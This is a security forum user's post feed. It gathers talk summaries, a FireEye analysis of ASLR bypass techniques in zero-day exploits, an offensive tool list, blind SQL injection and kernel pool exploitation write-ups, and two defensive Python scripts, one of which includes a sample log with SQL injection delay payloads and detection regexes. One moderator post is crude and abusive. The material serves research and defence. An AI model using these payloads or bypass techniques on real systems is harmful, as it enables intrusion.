Everything posted by Nytro
-
Hack3rcon 4 - Ms08-067 Under The Hood - John Degruyter

Description: The purpose of this talk is to get a better understanding of using a debugger and looking at the low-level process of exploiting a software vulnerability. We will be visiting our faithful old friend, ms08_067. First, we will look at the structure of the Metasploit module and the functions that make it up. Then we will move to the victim's system, where we will be firing up a debugger and taking a look at the vulnerable process, library and function. Next, we will launch the Metasploit module from our attack system and watch the memory corruption. Finally, we'll follow the exploit as it disables DEP in the acgenral.dll module and then jumps to our shellcode for a win.

Speakers: John Degruyter

For more information please visit: Hack3rCon^4 - Eye of the Storm; Hack3rcon 4 Videos (Hacking Illustrated Series InfoSec Tutorial Videos)

Source: Hack3rcon 4 - Ms08-067 Under The Hood - John Degruyter
-
Hack3rcon 4 - Advanced Evasion Techniques - Pwning The Next Generation Security Products (Keynote) - David Kennedy

Description: We know anti-virus is dead; there's no more beating it with a stick, and it's easy to get around. What about the next set of security products, and how do they actually work? Preventive technology is advancing and the attacks are getting slightly harder (albeit not much). This talk goes into advanced evasion techniques for getting around some of the new pieces of technology that we face out there. Everything from next-generation technologies, virtualization technologies, application firewalls, and more: this talk will show how to effectively test and identify how to best get around what we're seeing out there. It's time to pwn the next generation of security product lines.

David Kennedy (@dave_rel1k) is founder and principal security consultant of TrustedSec, an information security consulting firm located in Cleveland, Ohio. David was the former Chief Security Officer (CSO) for a Fortune 1000 company, where he ran the entire information security program. Kennedy is a co-author of the book "Metasploit: The Penetration Tester's Guide," the creator of the Social-Engineer Toolkit (SET), and Artillery. Kennedy has presented on a number of occasions at Black Hat, Defcon, ShmooCon, BSides, Infosec World, Notacon, AIDE, ISACA, ISSA, Infragard, Infosec Summit, Hack3rCon and a number of other security-related conferences. Kennedy has been interviewed by several news organizations including CNN, Fox News, and BBC World News. Kennedy was formerly on the Back|Track development team and Exploit-DB team and co-host of the Social-Engineer.org podcast. Kennedy is one of the co-authors of the Penetration Testing Execution Standard (PTES), a framework designed to fix the penetration testing industry. Kennedy is the co-founder of DerbyCon, a large-scale conference in Louisville, Kentucky.

Prior to Diebold, Kennedy was a VP of Consulting and Partner of a mid-size information security consulting company, running the security consulting practice. Prior to the private sector, Kennedy worked for the United States Marine Corps and deployed to Iraq twice for intelligence-related missions.

For more information please visit: Hack3rCon^4 - Eye of the Storm; Hack3rcon 4 Videos (Hacking Illustrated Series InfoSec Tutorial Videos)

Source: Hack3rcon 4 - Advanced Evasion Techniques - Pwning The Next Generation Security Products (Keynote) - David Kennedy
-
Problems with the Offtopic, Help, Requests and Market categories
Nytro replied to Nytro's topic in Important announcements
The problem has been solved... -
It was closed precisely to keep beggars like you out. Ban.
-
NSA intercepted millions of phone communications in France
Nytro replied to Usr6's topic in Security news
Great. We ordinary mortals can't do much. But if a bunch of states go after them, maybe something will get done. -
How to create your own mobile phone network
Nytro replied to Nytro's topic in Mobile security
Yes, spam. You drive around town in your car and send messages like crazy. -
[h=1]iLikeIT. How to create your own mobile phone network, so you can call for help after an earthquake[/h]
As is well known, when an earthquake of large magnitude strikes, the power grid and the phone networks go down. So how do we send an emergency message to rescuers if we end up trapped somewhere? The solution is fairly simple and was presented on iLikeIT with the help of Bogdan Alecu, a mobile security specialist. More details at: http://www.m-sec.net

It must be stated from the outset that it is illegal to create your own mobile phone network, and this solution should only be applied in cases of extreme emergency. The equipment you need is the following: a laptop, a USB stick holding special software, and a simple phone, regardless of model and regardless of how old it is. If the power grid is down, the laptop can still be used thanks to its built-in battery. The phone connects to the laptop with an ordinary data cable. Also, the software on the USB stick does not need to be installed; it can be run directly from the removable device. Here are a few details:

1. The operating system is Ubuntu, and on it was installed the software that controls the entire phone network. This software is called OpenBTS and can be downloaded for free from this address.
2. The whole operating system was installed on a USB stick and ran from it.
3. The entire system can be configured to run and start automatically, including on a notebook with modest requirements (4GB RAM, USB 2.0 port, dual-core processor). The phone used as the transceiver station is a Motorola C123 connected via USB, onto which OpenBTS loads its own firmware. In other words, another open-source operating system is loaded onto this phone, and the transmit frequency as well as the other operating details are controlled by OpenBTS.
4. Of course, instead of this phone, a GSM antenna with an amplifier can be used to cover a larger area.
5. The newly created network can be used both to send warning messages and to locate potential victims. Since it is a network under the full control of the user, this portable setup can be used to locate victims. The transmit power can be limited, as can the distance over which it transmits (in steps of 500m), and when a new phone registers on the network the operator is notified. This way you narrow the search area to that limited zone of up to 500m.
6. So everyone understands, the idea is this: it does not matter if all the mobile operators in Romania are down at that moment. Once you create your own phone network, the other phones within its coverage area will automatically see your network and connect to it.
7. Also, it does not matter whether the phone is locked to a particular network: Vodafone, Orange, Cosmote or Digi.

Source and video: iLikeIT. Cum sa-ti creezi propria retea de telefonie mobila, ca sa ceri ajutor dupa un cutremur

This can be put to good use. You come up with ideas for doing crap.
-
"from people's online email address books and instant messaging (IM) "buddy lists" That's ugly and it's not legal. But most of the time email addresses are made far too public.
-
Problems with the Offtopic, Help, Requests and Market categories
Nytro replied to Nytro's topic in Important announcements
Tutorial: "How to get banned" -
ASLR Bypass Apocalypse in Recent Zero-Day Exploits
October 15, 2013 | By Xiaobo Chen

ASLR (Address Space Layout Randomization) is one of the most effective protection mechanisms in modern operating systems. But it's not perfect. Many recent APT attacks have used innovative techniques to bypass ASLR. Here are just a few interesting bypass techniques that we have tracked in the past year:

- Using non-ASLR modules
- Modifying the BSTR length/null terminator
- Modifying the Array object

The following sections explain each of these techniques in detail.

Non-ASLR modules

Loading a non-ASLR module is the easiest and most popular way to defeat ASLR protection. Two popular non-ASLR modules are used in IE zero-day exploits: MSVCR71.DLL and HXDS.DLL.

MSVCR71.DLL: JRE 1.6.x ships with an old version of the Microsoft Visual C Runtime Library that was not compiled with the /DYNAMICBASE option. By default, this DLL is loaded into the IE process at a fixed location in the following OS and IE combinations: Windows 7 and Internet Explorer 8; Windows 7 and Internet Explorer 9.

HXDS.DLL, shipped with MS Office 2010/2007, is not compiled with ASLR. This technique was first described here, and is now the most frequently used ASLR bypass for IE 8/9 on Windows 7. This DLL is loaded when the browser loads a page with 'ms-help://' in the URL.

The following zero-day exploits used at least one of these techniques to bypass ASLR: CVE-2013-3893, CVE-2013-1347, CVE-2012-4969, CVE-2012-4792.

Limitations: The non-ASLR module technique requires IE 8 and IE 9 to run with old software such as JRE 1.6 or Office 2007/2010. Upgrading to the latest versions of Java/Office can prevent this type of attack.

Modify the BSTR length/null terminator

This technique first appeared in the 2010 Pwn2Own IE 8 exploit by Peter Vreugdenhil. It applies only to specific types of vulnerabilities that can overwrite memory, such as buffer overflows, arbitrary memory writes, and increasing or decreasing the content of a memory pointer. An arbitrary memory write does not directly control EIP. Most of the time, the exploit overwrites important program data such as function pointers to execute code. For attackers, the good thing about these types of vulnerabilities is that they can corrupt the length of a BSTR so that using the BSTR can access memory outside of its original boundaries. Such accesses may disclose memory addresses that can be used to pinpoint libraries suitable for ROP. Once the exploit has bypassed ASLR in this way, it can then use the same memory corruption bug to control EIP.

Few vulnerabilities can be used to modify the BSTR length. For example, some vulnerabilities can only increase/decrease memory pointers by one or two bytes. In this case, the attacker can modify the null terminator of a BSTR to concatenate the string with the next object. Subsequent accesses to the modified BSTR return the concatenated object's content as part of the BSTR, where attackers can usually find information related to DLL base addresses.

CVE-2013-0640: The Adobe XFA zero-day exploit uses this technique to find the AcroForm.api base address and builds a ROP chain dynamically to bypass ASLR and DEP. With this vulnerability, the exploit can decrease a controllable memory pointer before calling the function pointer from its vftable. Consider the following memory layout before the DEC operation:

[string][null][non-null data][object]

After the DEC operation (in my tests, it is decreased twice) the memory becomes:

[string][\xfe][non-null data][object]

For further details, refer to the technique write-up on the Immunity Inc. blog.

Limitations: This technique usually requires multiple writes to leak the necessary info, and the exploit writer has to carefully craft the heap layout to ensure that the length field is corrupted instead of other objects in memory. Since IE 9, Microsoft has used Nozzle to prevent heap spraying/feng shui, so sometimes the attacker must use the VBArray technique to craft the heap layout.

Modify the Array object

The array object length modification is similar to the BSTR length modification: they both require a certain class of "user-friendly" vulnerabilities. Even better, from the attacker's view, is that once the length changes, the attacker can also arbitrarily read from or write to memory, or basically take control of the whole process flow and achieve code execution. Here is the list of known zero-day exploits using this technique:

CVE-2013-0634: This exploit involves an Adobe Flash Player regex handling buffer overflow. The attacker overwrites the length of a Vector.<Number> object, and then reads more memory content to get the base address of flash.ocx. Here's how the exploit works: Set up a continuous memory layout by allocating the following objects: Free the <Number> object at index 1 of the above objects as follows: obj[1] = null; Allocate the new RegExp object. This allocation reuses memory in the obj[1] position as follows: boom = "(?i)()()(?-i)||||||||||||||||||||||||"; var trigger = new RegExp(boom, ""); Later, the malformed expression overwrites the length of the Vector.<Number> object in obj[2] to enlarge it. With a corrupted size, the attacker can use obj[2] to read from or write to memory in a huge region to locate the flash.ocx base address and overwrite a vftable to execute the payload.

CVE-2013-3163: This vulnerability involves an IE CBlockContainerBlock object use-after-free error. This exploit is similar to CVE-2013-0634, but more sophisticated. Basically, this vulnerability modifies arbitrary memory content using an OR instruction. This instruction is something like the following:

or dword ptr [esi+8],20000h

Here's how it works: First, the attacker sprays the target heap memory with Vector.<uint> objects as follows. After the spray, those objects are stored aligned at a stable memory address. For example: the first dword, 0x03f0, is the length of the Vector.<uint> object, and the yellow-marked values correspond to the values in the above spray code. If the attacker makes esi+8 point to 0x03f0, the size becomes 0x0203f0 after the OR operation, which is much larger than the original size. With the larger access range, the attacker can change the next object's length to 0x3FFFFFF0. From there, the attacker can access the whole memory space of the IE process. ASLR is useless because the attacker can retrieve the entire DLL images for kernel32/NTDLL directly from memory. By dynamically searching for stack pivot gadgets in the text section and locating the ZwProtectVirtualMemory native API address from the IAT, the attacker can construct a ROP chain to change the memory attributes and bypass DEP as follows. By crafting the memory layout, the attacker also allocates a Vector.<object> that contains the flash.Media.Sound() object. The attacker uses the corrupted Vector.<uint> object to search for the sound object in memory and overwrite its vftable to point to the ROP payload and shellcode.

CVE-2013-1690: The use-after-free vulnerability in Firefox's DocumentViewerImpl object allows the user to write a word value 0x0001 into an arbitrary memory location as follows. In the above code, all the variables that start with "m" are read from the user-controlled object. If the user can set the object to meet the condition in the second "if" statement, it forces the code path into the setImageAnimationMode() call, where the memory write is triggered. Inside setImageAnimationMode(), the code looks like the following. In this exploit, the attacker tries to use ArrayBuffer to craft the heap layout. In the following code, each ArrayBuffer element for var2 has the original size 0xff004. After triggering the vulnerability, the attacker increases the size of the array to 0x010ff004. The attacker can also locate this ArrayBuffer by comparing the byteLength in JavaScript. Then, the attacker can read from or write to memory with the corrupted ArrayBuffer. In this case, the attacker chose to disclose the NTDLL base address from SharedUserData (0x7ffe0300), and manually hardcoded the offset to construct the ROP payload.

CVE-2013-1493: This vulnerability involves a Java CMM integer overflow that allows overwriting the array length field in memory. During exploitation, the array length actually expands to 0x7fffffff, and the attacker can search for the securityManager object in memory and null it to break the sandbox. This technique is much more effective than overwriting function pointers and dealing with ASLR/DEP to get native code execution.

The Array object modification technique is much better than other techniques. For the Flash ActionScript vector technique, there are no heap spray mitigations at all. As long as you have a memory-write vulnerability, it is easily implemented.

Summary

The following table outlines recent APT zero-day exploits and what bypass techniques they used:

Conclusion

ASLR bypassing has become more and more common in zero-day attacks. We have seen previous IE zero-day exploits using a Microsoft Office non-ASLR DLL to bypass it, and Microsoft also added mitigations in its latest OS and browser to prevent use of the non-ASLR module to defeat ASLR. Because the old technique will no longer work and can be easily detected, cybercriminals will have to use the advanced exploit techniques. For specific vulnerabilities that allow writing memory, combining Vector.<uint> and Vector.<object> is more reliable and flexible. With just one shot, extending the exploit from writing a single byte to reading or writing gigabytes is easy and works for the latest OS and browser regardless of the OS, application, or language version. Many researchers have published research on ASLR bypassing, such as Dion Blazakis's JIT spray and Yuyang's LdrHotPatchRoutine technique. But so far we haven't seen any zero-day exploit leveraging them in the wild. The reason could be that these techniques are generic approaches to defeating ASLR, and they are usually fixed quickly after going public. But there is no generic way to fix vulnerability-specific issues. In the future, expect more and more zero-day exploits using similar or more advanced techniques. We may need new mitigations in our OSs and security products to defeat them. Thanks again to Dan Caselden and Yichong Lin for their help with this analysis.

Source: ASLR Bypass Apocalypse in Recent Zero-Day Exploits | FireEye Blog
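The "Non-ASLR modules" section above hinges on one PE header bit: a module linked without /DYNAMICBASE does not carry IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE and is loaded at a fixed address. The following checker is an added example (not FireEye's code and not from the article) that reads that bit straight from the PE headers so a defender can audit which DLLs in a process or product directory would serve as ASLR bypass material. The helper that builds a fake PE header exists only to provide constructed test input; the module names MSVCR71.DLL and HXDS.DLL in the sample are taken from the article, while their bytes are built locally.

```python
import os
import struct
import sys

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification (winnt.h).
DLLCHAR_DYNAMIC_BASE = 0x0040   # linked with /DYNAMICBASE: image can be relocated by ASLR
DLLCHAR_NX_COMPAT = 0x0100      # linked with /NXCOMPAT: image is DEP-compatible


def dll_characteristics(data: bytes) -> int:
    """Return the DllCharacteristics field of the PE image held in `data`."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    size_of_optional = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20                                       # IMAGE_OPTIONAL_HEADER
    if size_of_optional < 72 or len(data) < opt + 72:
        raise ValueError("optional header too short")
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):                       # PE32 / PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics sits at offset 70 of the optional header in both PE32 and PE32+.
    return struct.unpack_from("<H", data, opt + 70)[0]


def is_aslr_enabled(data: bytes) -> bool:
    """True when the image was linked with /DYNAMICBASE."""
    return bool(dll_characteristics(data) & DLLCHAR_DYNAMIC_BASE)


def find_non_aslr_modules(images: dict) -> list:
    """Given {name: image bytes}, return the names lacking DYNAMIC_BASE, sorted."""
    return sorted(name for name, data in images.items() if not is_aslr_enabled(data))


def build_fake_pe(characteristics: int) -> bytes:
    """Construct a minimal, non-loadable PE32 header carrying the given DllCharacteristics.
    Only the fields the checker reads are populated; this is constructed test input."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # IMAGE_FILE_HEADER: Machine=i386, 1 section, no timestamp/symbols, 224-byte optional header.
    coff = struct.pack("<HHIIIHH", 0x014C, 1, 0, 0, 0, 224, 0x2102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                 # PE32 magic
    struct.pack_into("<H", opt, 70, characteristics)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


def scan_directory(root: str) -> list:
    """Walk `root` and return paths of .dll/.exe/.ocx files that lack DYNAMIC_BASE."""
    found = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".dll", ".exe", ".ocx")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read(4096)              # headers are at the start of the file
                if not is_aslr_enabled(data):
                    found.append(path)
            except (OSError, ValueError):
                continue                              # unreadable or not a PE: skip
    return found


if __name__ == "__main__":
    # Constructed sample: names from the article, bytes built locally.
    sample = {
        "MSVCR71.DLL": build_fake_pe(0x0000),
        "HXDS.DLL": build_fake_pe(DLLCHAR_NX_COMPAT),
        "modern.dll": build_fake_pe(DLLCHAR_DYNAMIC_BASE | DLLCHAR_NX_COMPAT),
    }
    print("non-ASLR modules in sample:", find_non_aslr_modules(sample))
    if len(sys.argv) > 1:
        for path in scan_directory(sys.argv[1]):
            print("no /DYNAMICBASE:", path)
```

Run it with a directory argument (for example an Office or JRE install folder) to list the real modules that would load at a fixed address; a module on that list inside a browser process is exactly the condition the article's "Limitations" paragraph says upgrading removes.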
-
Problems with the Offtopic, Help, Requests and Market categories
Nytro posted a topic in Important announcements
Hi, Some problems have appeared with the Offtopic, Requests and Help categories (+ others). It seems new topics can no longer be opened in those categories. You can't even post anymore. I promise I will fix the problem tomorrow evening. Until then, learn one thing: STOP BEING BEGGARS. I keep watching the forum and I hope to see at least 2-3 people who step forward and show that they have the right mentality and want to help the community. But everyone looks out for themselves; nobody would post anything useful for the rest of the community. If you check the latest posts yourselves you will see the main discussion categories: Offtopic, Requests and Help. You know how to ask for help, how to hold out your hand, but you don't know how to help in return. Beggars, moochers, that's what you are. So, for 24 hours, for now, you will not be able to post in those categories. Make a contribution yourselves. Do something useful for the others too, not just for yourselves. If you don't like the decision, throw a tantrum and suck my dick. Fuck you. -
Tools

FreeRDP-pth (20/10/2013) - FreeRDP-pth is a slightly modified version of FreeRDP that tries to authenticate using a password hash instead of a password. This works only against RDP v8.1 servers (Windows 2012 R2 at the time of writing) and even then, only for members of the administrators group. Refer to the companion blog post for more information about Restricted Mode and pass-the-hash.
UDP Protocol Analysis – Interactive Python Tool (9/9/2013) - UDP protocol analysis is a python module which can be used in scripted analysis or interactively using ipython.
Local MySQL Password Bruteforcer (15/2/2013) - Local MySQL Password Bruteforcer is a python script to assess the strength of the local MySQL access passwords.
HeaderCheck (15/2/2013) - HeaderCheck is a python script used to check the security settings of various headers returned by web servers.
ssl-cipher-suite-enum (13/2/2013) - ssl-cipher-suite-enum is a perl script to enumerate the SSL cipher suites supported by network services (principally HTTPS).
UNIXSocketScanner (31/1/2013) - UNIXSocketScanner is a perl script to locally enumerate UNIX domain sockets.
get-dhcp-opts (12/12/2012) - get-dhcp-opts is a tool to discover DHCP/BOOTP servers on your LAN and dump the DHCP/BOOTP options.
VulnApp (15/9/2012) - VulnApp is a vulnerable web application written in ASP.net.
rdp-sec-check (15/7/2012) - rdp-sec-check is a perl script to enumerate the security settings of an RDP service (AKA Terminal Services).
nopc (3/7/2012) - nopc is a Nessus-based UNIX patch checker. It utilises Nessus' nasls and instructs you on what data you need to manually get from the system to perform that patch check. This was developed for situations when network connectivity to the systems under review is not possible.
secdump (24/3/2012) - secdump is a simple meterpreter module that uploads and runs gsecdump. Nothing fancy, just a time saver.
SSHatter (16/2/2011) - SSHatter is a perl script to perform brute force attacks on SSH.
hoppy (9/10/2009) - hoppy is a python script to probe HTTP options and perform scanning for information disclosure issues.
ManySSL (9/12/2008) - ManySSL is a perl script to enumerate the SSL cipher suites supported by network services (principally HTTPS).
udp-proto-scanner (26/11/2008) - udp-proto-scanner is a perl script which discovers UDP services by sending triggers to a list of hosts.
MS08-067 check (18/11/2008) - MS08-067 check is a python script which can anonymously check if a target machine or a list of target machines are affected by the MS08-067 vulnerability.
polenum (30/10/2008) - polenum is a python script which can be used to get the password policy from a Windows machine.
vessl (30/10/2008) - vessl is a bash script that can fetch and verify the SSL certificate of a remote server.
enum4linux (16/9/2008) - A Linux alternative to enum.exe for enumerating data from Windows and Samba hosts.
phrasen|drescher (27/6/2008) - A tool for bruteforce guessing pass phrases, password hashes or remote accounts of various services.
BSQL brute forcer V2 (18/6/2008) - Updated version of the Blind SQL Injection Brute Forcer from www.514.es. Works against PostgreSQL, MySQL, MSSQL and Oracle and supports custom SQL queries.
acccheck (9/4/2008) - The tool is designed as a password dictionary attack tool that targets Windows authentication via the SMB protocol. It is really a wrapper script around the 'smbclient' binary, and as a result is dependent on it for its execution.
MIBparse (7/4/2008) - MIBparse.pl has been designed as an offline parser to quickly parse output from SNMP tools such as 'snmpwalk'.
nbtscan-1.5.2 (3/4/2008) - NBTscan is a program for scanning IP networks for NetBIOS name information.
XSS Tunnel (2/4/2008) - XSS Tunnel is a standard HTTP proxy which sits on an attacker's system. Any tool that is configured to use it will tunnel its traffic through the active XSS Channel on the XSS Shell server.
Banner Grab (2/4/2008) - BannerGrab is a tool that performs connection, trigger-based and basic information collection from network services.
viewstate (2/4/2008) - Viewstate is an ASP.Net viewstate decoder, checker, parser and encoder.
Sun Patch Check (2/4/2008) - Sun Patch Check lists missing security patches by comparing the output from the Sun Solaris "showrev" command to that from the Sun recommended patch list.
XSS Shell (2/4/2008) - XSS Shell is a powerful XSS backdoor; in XSS Shell one can interactively send requests and get responses from the victim, and it allows you to keep control of the session.
sucrack (31/3/2008) - sucrack is a multithreaded Linux/UNIX tool for brute-force cracking local user accounts via su.
rmiInfo (31/3/2008) - A tool for extracting information from Java Remote Method Invocation (RMI) services.
onesixtyone (31/3/2008) - An enhanced version of Solar Eclipse's SNMP community string guessing tool.
http-dir-enum (28/3/2008) - A command-line tool for bruteforce-guessing directory and file names on web servers.
BSQL Hacker (16/1/2008) - BSQL (Blind SQL) Hacker is an automated SQL Injection Framework / Tool designed to exploit SQL injection vulnerabilities in virtually any database.

Source: http://labs.portcullis.co.uk/tools/
-
[h=1]Deep Blind SQL Injection[/h]
Deep Blind SQL Injection is a new way to exploit Blind SQL Injections with a 66% reduction in the number of requests. Reading data becomes more complex, but it is still possible to retrieve it, and with a 66% reduction in the number of requests made of the server, requiring two rather than six requests to retrieve each char.

Ferruh Mavituna, www.portcullis-security.com

Blind SQL Injection attacks are described in several papers. If the injection point is completely blind then the only way to extract data is using time-based attacks like WAITFOR DELAY, BENCHMARK etc. When it comes to reading data there are two known ways:
1. Reading data bit by bit
2. Reading data through a binary search algorithm with character patterns
Both methods have a one request – one response limit, and on average for each char you need to make six requests to the server.

In Deep Blind SQL Injection reading data is more complex than in classic blind injection. However it is still possible to retrieve data, and moreover it is possible with a 66% reduction in the number of requests made of the server, requiring two rather than six requests to retrieve each char. Deep Blind SQL Injection works well with MS SQL Server and may work in other databases such as Oracle, PostgreSQL etc.

This method of injection, which retrieves more than one response per request, is achieved using time delay differences. For example, if the first half byte of the char is 6, the database is going to wait for 12 seconds; if the second half byte of the char is 1 it's going to wait for 2 seconds. An attacker should store the server response times and divide them by 2 to understand the response. Finally, in 2 requests we got 0x61, which is 'a'. Obviously, depending on the conditions, it's possible to use larger or smaller dividers than 2.

Download: http://labs.portcullis.co.uk/download/Deep_Blind_SQL_Injection.pdf
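The distinguishing trait of the technique described above is that the delay length itself carries data: a classic time-based probe repeats one fixed delay, whereas the nibble-times-2-seconds encoding produces a spread of different WAITFOR DELAY / SLEEP values from the same client. The following log scanner is an added example, written for this post and not part of the paper; it looks for the timing primitives the paper names (WAITFOR DELAY, BENCHMARK) plus the MySQL/PostgreSQL SLEEP and pg_sleep equivalents in web access logs, and flags clients whose delay values vary. The log format and all hosts and requests in the sample are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Timing primitives used by time-based blind SQL injection. The paper names
# WAITFOR DELAY (MS SQL Server) and BENCHMARK (MySQL); SLEEP and pg_sleep are
# the MySQL and PostgreSQL equivalents a detector should also cover.
DELAY_PATTERNS = [
    ("mssql_waitfor", re.compile(r"waitfor\s+delay\s+'(\d{1,2}):(\d{1,2}):(\d{1,2})'", re.I)),
    ("mysql_sleep", re.compile(r"\bsleep\s*\(\s*(\d+(?:\.\d+)?)\s*\)", re.I)),
    ("mysql_benchmark", re.compile(r"\bbenchmark\s*\(\s*(\d+)", re.I)),
    ("pgsql_sleep", re.compile(r"\bpg_sleep\s*\(\s*(\d+(?:\.\d+)?)\s*\)", re.I)),
]

# Combined-log style access line: client, identd, user, [timestamp], "METHOD target ..."
LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+)')

# Constructed sample log (documentation-range IPs): one client sending varying
# WAITFOR delays, one repeating a fixed SLEEP(5), and one benign request.
SAMPLE_LOG = """\
203.0.113.7 - - [20/Oct/2013:10:00:01 +0000] "GET /products.aspx?id=7;WAITFOR%20DELAY%20'0:0:12'-- HTTP/1.1" 200 512
203.0.113.7 - - [20/Oct/2013:10:00:14 +0000] "GET /products.aspx?id=7;WAITFOR%20DELAY%20'0:0:2'-- HTTP/1.1" 200 512
203.0.113.7 - - [20/Oct/2013:10:00:17 +0000] "GET /products.aspx?id=7;WAITFOR%20DELAY%20'0:0:8'-- HTTP/1.1" 200 512
198.51.100.9 - - [20/Oct/2013:10:01:00 +0000] "GET /search.php?q=a'+AND+SLEEP(5)--+ HTTP/1.1" 200 100
198.51.100.9 - - [20/Oct/2013:10:01:06 +0000] "GET /search.php?q=b'+AND+SLEEP(5)--+ HTTP/1.1" 200 100
192.0.2.44 - - [20/Oct/2013:10:02:00 +0000] "GET /products.aspx?id=7 HTTP/1.1" 200 512
"""


def delay_in_request(target: str):
    """Return (kind, magnitude) if the URL-decoded request carries a timing primitive, else None.
    Magnitude is seconds for WAITFOR/SLEEP/pg_sleep and the iteration count for BENCHMARK."""
    text = unquote_plus(target)
    for kind, pattern in DELAY_PATTERNS:
        m = pattern.search(text)
        if m is None:
            continue
        if kind == "mssql_waitfor":
            hours, minutes, seconds = (int(x) for x in m.groups())
            return kind, float(hours * 3600 + minutes * 60 + seconds)
        return kind, float(m.group(1))
    return None


def analyze(lines):
    """Summarise timing-primitive requests per client: hit count, distinct magnitudes, kinds."""
    per_client = defaultdict(lambda: {"hits": 0, "delays": set(), "kinds": set()})
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        found = delay_in_request(m.group("target"))
        if found is None:
            continue
        kind, magnitude = found
        record = per_client[m.group("client")]
        record["hits"] += 1
        record["delays"].add(magnitude)
        record["kinds"].add(kind)
    return dict(per_client)


def variable_delay_clients(summary, min_distinct=2):
    """Clients that used several different delay values, i.e. delays that look like
    encoded data rather than a single fixed probe."""
    return sorted(client for client, rec in summary.items() if len(rec["delays"]) >= min_distinct)


if __name__ == "__main__":
    summary = analyze(SAMPLE_LOG.splitlines())
    for client, rec in sorted(summary.items()):
        print(client, rec["hits"], sorted(rec["delays"]), sorted(rec["kinds"]))
    print("variable-delay clients:", variable_delay_clients(summary))
```

Any client that shows up in `analyze` at all warrants a look, since a timing primitive in a query parameter has no legitimate use; `variable_delay_clients` narrows that to the pattern this paper describes, where the requests are few but each one carries a nibble of data in its delay.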
-
XSS Tunnelling: Tunnelling HTTP traffic through XSS Channels
Ferruh Mavituna, www.portcullis-security.com

Contents:
XSS Tunnelling
  About XSS Tunnelling
  What Is An XSS Channel?
  How Does XSS Shell Work?
  Points of Interest
  Why Is It Better Than The Classic XSS Attacks?
What Is XSS Tunnelling?
What Is An XSS Tunnel?
Why Tunnel HTTP Traffic Through An XSS Channel?
Benefits Of XSS Tunnelling
How Does XSS Tunnel Work?
  An Attack Process

Download: http://labs.portcullis.co.uk/download/XSS-Tunnelling.pdf
-
SSL Good Practice Guide
Version: 1.0 | Date: 20/09/2013 | Task number: SSL_Whitepaper
Prepared by: Mike W. Emery, Researcher, Portcullis Computer Security Limited, The Grange Barn, Pike's End, Pinner, Middlesex HA5 2EX, United Kingdom

Contents:
1 Introduction
2 SSL Basics
3 Recommendations
4 Areas of Concern
5 Sample Implementations
Appendix A: About Portcullis Computer Security Limited

Download: http://labs.portcullis.co.uk/download/SSLGPG.pdf
-
Pool Blade: A new approach for kernel pool exploitation

Abstract: In recent years many methods have been discussed regarding the exploitation of pool overflow corruptions. Most of these methods are based on the architecture of the pool manager in Windows. In this paper I discuss a generic method that is based on kernel objects rather than the pool manager; because of the nature of this technique it is possible to exploit pool overflow vulnerabilities more easily and more reliably. So I introduce the Pool Blade helper class, which lets us exploit a pool overflow in a very short time by just calling some interface and triggering the vulnerability. Pool Blade and the technique discussed here are only supported on Windows XP/2003/Vista, but they can be extended to support more recent Windows operating systems.

Q: Why Pool Blade? A: Because this method is fast and reliable.
Q: How reliable? A: With this technique we don't corrupt anything, so the exploit works 100%.
Q: Fast? A: You have a pool overflow; you can exploit it in 5 minutes by just knowing the size of the vulnerable buffer.
Q: What is the impact? A: Everyone can exploit local pool overflows on Windows easily and reliably to get escalated privileges.
Q: What is PoolBlade not? A: It cannot be used to exploit pool overflows on Windows 7, and for small buffer sizes you should find other suitable objects. And of course it can only be used in the non-paged pool.
Q: How can it be used? A: You can use the PoolBlade helper class, or read the document and implement a more customized version for your own purpose.

The method and the helper class are demonstrated with an antivirus driver vulnerability in the following research paper. White paper: PoolBlade. Exploit code: AhnlabV3MedCoreD. Video: The demonstrated vulnerability is in the Ahnlab V3 Internet Security product. Of course, the vulnerability was reported to the vendor a few months ago.

Final note: as you may know, our Windows exploitation course, which contains kernel exploitation, has just been released; if you like, you can take it now!

Source: https://zdresearch.com/pool-blade-a-new-approach-for-kernel-pool-exploitation/
-
[h=1]NFTables IPTables-Replacement Queued For Linux 3.13[/h]
[h=2]Posted by Michael Larabel on October 19, 2013[/h]
NFTables is a new firewall subsystem / packet filtering engine for the Linux kernel that is poised to replace iptables. NFTables has been in development for several years by the upstream author of Netfilter. This new nftables system is set to be merged into the Linux 3.13 kernel. NFTables is intended to replace IPTables by offering a simpler kernel ABI, reduced code duplication, improved error reporting, and more efficient support for filtering rules. Beyond IPTables, it also replaces the ip6tables, arptables, and ebtables frameworks, while offering a compatibility layer for iptables. For those into networking and wanting to learn more about NFTables, visit its Netfilter.org project page. Earlier this week a pull request was sent in for pulling nf_tables into the next Linux kernel release through the net-next branch. The pull request was accepted and is now living in the net-next Git repository for Linux 3.13. IPTables won't die off in Linux 3.13 as there's still work ahead for NFTables, but those wanting to try out the new code when it's mainlined can find this how-to guide.

Source: [Phoronix] NFTables IPTables-Replacement Queued For Linux 3.13
-
[h=1]CVE-2013-0640: Adobe Reader XFA oneOfChild Un-initialized memory vulnerability (part 1)[/h] Published 26/09/2013 | By MTB

This document presents a technical report on the CVE-2013-0640 vulnerability affecting Adobe Reader versions 9, 10 and 11. It was first spotted in February 2013 and has been actively used in the wild. This is the first article of a set; it covers the detailed analysis of the bug.

